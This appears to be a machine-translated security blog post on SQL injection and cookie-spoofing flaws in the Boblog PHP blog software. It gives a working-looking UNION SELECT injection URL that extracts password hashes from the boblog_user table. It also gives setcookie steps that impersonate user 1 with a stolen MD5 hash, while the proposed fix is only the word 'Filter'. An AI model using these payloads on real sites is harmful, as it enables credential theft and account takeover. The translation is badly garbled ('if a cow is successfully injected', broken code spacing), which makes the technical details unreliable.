Author: Mind
I have read some comments from my xhming article.
Download boblog again.
The injection vulnerability has been identified by xhming.
Previously, I found an injection vulnerability similar to this vulnerability.
Unfortunately ....
View the code in the classic dialog box
Index. php
1
If ($ go) @ list ($ job, $ itemid) = @ explode (_, basename ($ go ));
The original injection statement is index. php? Go = category_0) union select 1, concat (userpsw) from boblog_user % 23
That is, after explode processing, if the database is boblog_user, it will only become a boblog.
What's more, injection vulnerabilities exist.
'Category 'in ({$ all_needed_cates })");
It will not be because of the # symbol, but the subsequent things will only become from boblog_user #) PS: Probably because I won't bypass it here
Cookie spoofing vulnerability is simple
If a cow is successfully injected, the MD5 password is not required to run.
Direct
Setcookie (userid, 1 ,);
Setcookie (userpsw, md5 ciphertext ,);
Yes ......
Fix :..... Filter